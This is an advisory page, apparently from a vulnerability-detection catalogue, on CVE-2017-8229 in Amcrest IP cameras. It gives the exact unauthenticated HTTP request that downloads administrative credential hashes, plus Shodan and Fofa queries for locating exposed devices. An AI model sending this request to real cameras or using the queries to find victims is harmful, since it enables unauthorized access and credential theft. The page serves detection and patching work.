🔙 목록으로 돌아가기

CVE-2017-8229: Amcrest IP Camera Web Management - Data Exposure

TitleAmcrest IP Camera Web Management - Data Exposure
Authorpussycat0x
SeverityCritical
ImpactAn attacker can gain unauthorized access to sensitive data.
RemediationApply the latest firmware update provided by the vendor to fix the vulnerability.
CVSS Score9.8
EPSS Score0.92899
CVE IDCVE-2017-8229
CWE IDCWE-255
Shodan Queryhtml:"Amcrest"http.html:"amcrest"
Fofa QueryAmcrestamcrestbody="amcrest"
Tags cve2017 cve packetstorm seclists amcrest iot vuln

🔍 Vulnerability Description

Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.

🌐 HTTP Request

GET /current_config/Sha1Account1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-8229.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-8229.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A